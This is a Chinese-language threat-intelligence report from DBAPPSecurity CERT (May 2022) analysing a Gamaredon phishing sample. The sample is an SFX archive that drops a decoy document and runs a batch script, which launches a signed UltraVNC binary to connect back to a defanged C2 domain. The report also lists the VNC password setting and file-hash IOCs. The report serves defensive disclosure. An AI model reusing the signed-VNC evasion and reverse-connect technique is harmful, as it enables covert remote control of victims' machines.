一
背景概述
Gamaredon组织是俄罗斯FSB(联邦安全局)长期军事和政治对抗乌克兰军事力量的网络间谍组织,至少自 2013 年以来一直活跃,长期负责发起针对乌克兰政府的定向攻击。近期,安恒信息应急响应中心监测到一例由Gamaredon制作的钓鱼样本。样本为SFX自解压文件,恶意代码执行后释放诱饵文档展示页面如下:
诱饵文档主要内容为:“前线武装、占领区相关管理人员的奖赏补贴和管理费用的预算账单说明”。
二
样本分析
SFX自解压程序执行时会释放名为watchta.exe的程序、释放并打开prem.docx诱饵文档。
SFX自解压程序压缩内容如下,在用户运行自解压程序时会将工作文件夹设置为%temp%目录并自动执行名为“1961419.cmd”的批处理脚本:
批处理脚本内容如下,首先释放出明文prem.docx的诱饵文档并打开,随后将压缩包中的exe程序重命名为 watchta.exe,结束当前进程列表中名为watchta.exe的进程并执行所释放的watchta.exe,等待12秒后再次带参执行watchta.exe 参数为“- autoreconnect -id: %RANDOM%_%COMPUTERNAME% – connect linux-techworld[.]com:443”
第一次执行watchta.exe会根据UltraVNC.ini配置文件配置被控端,密码为:passwd=A7F8FC867315B7FF5F。HTTP端口为:HTTPPortNumber=5800。
第二次执行的watchta.exe会根据参数连接到linux-techworld[.]com:443控制端。
经分析,watchta.exe具有uvnc bvba公司合法数字证书的VNC管理软件,使用合法的VNC管理软件可避免杀软查杀。
经测试发现该VNC软件包含强大的远程控制功能。
此次SFC自解压文件中与以往Gamaredon组织样本风格一致,执行批处理脚本配置文件。
安恒信息威胁情报平台已检出linux-techworld[.]com:443通信域名为Gamaredon组织资产。
三
IOC
|
7ZSfxMod_x86.exe |
DE71A9BFCFA46F8186F53B41D7B7E40F |
|
watchta.exe |
6F0020F104E54165828A9F6239CCC2D6 |
|
linux-techworld[.]com:443 |
|
四
加固建议
-
定期检测系统漏洞并及时更新补丁;
-
定期修改用户名密码,避免使用弱口令;
-
不随意打开来历不明的邮件及附件;
-
不随意下载或打开来历不明的文件;
-
工作中的重要文件资料应设置严格的访问权限;
-
可使用安恒威胁分析平台https://ti.dbappsecurity.com.cn对未知文件进行检测。
安恒信息CERT
2022年5月
原文始发于微信公众号(安恒信息CERT):Gamaredon钓鱼样本分析
